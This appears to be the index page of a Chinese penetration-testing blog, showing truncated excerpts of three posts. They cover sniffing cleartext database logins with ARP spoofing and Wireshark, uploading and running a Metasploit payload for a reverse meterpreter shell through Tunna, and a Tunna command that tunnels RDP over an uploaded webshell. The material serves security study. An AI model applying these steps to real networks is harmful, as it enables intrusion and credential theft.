对数据库进行中间人攻击

不是什么新东西,在drops看文章看见,觉得很有意思,就动手试了一下,just fun! 开始看见如此高大上的文章,以为很难,试过发现其实就和在内网玩arp插xss代码一样简单。 执行select @@version;用wireshark抓包之,如图: 结果: 数据库的执行语句和执行结果都明文进行传输,那么在内网是不是可以直接arp抓包获取客户端登陆的密码(客户端登陆的请求可不止有http,所以如果能抓数据连接包,比抓http的简单粗暴多了。) 不过我们这里说的是...

阅读全文>>

Tunna & Msf反弹shell

在内网渗透的某些情况下,数据只进不出,但是目标Http数据必须得出来吧.. 之前一篇文章提到用Tunna进行转发内网的数据(Tunna内网转发) 提到过,它同样能结合Msf反弹meterpreter.Let's Start. 1.首先使用Msf生成一个payload绑定在12345端口 2.上传到网站目录&增加执行权限&执行     ①.上传生成的payload到tmp目录     ②.chmod +x /tmp/bi...

阅读全文>>

Tunna内网转发

Tunna和reduh原理一样.. 使用方法: 上传源码包中文件夹webshell下的脚本至网站目录 然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l ...

阅读全文>>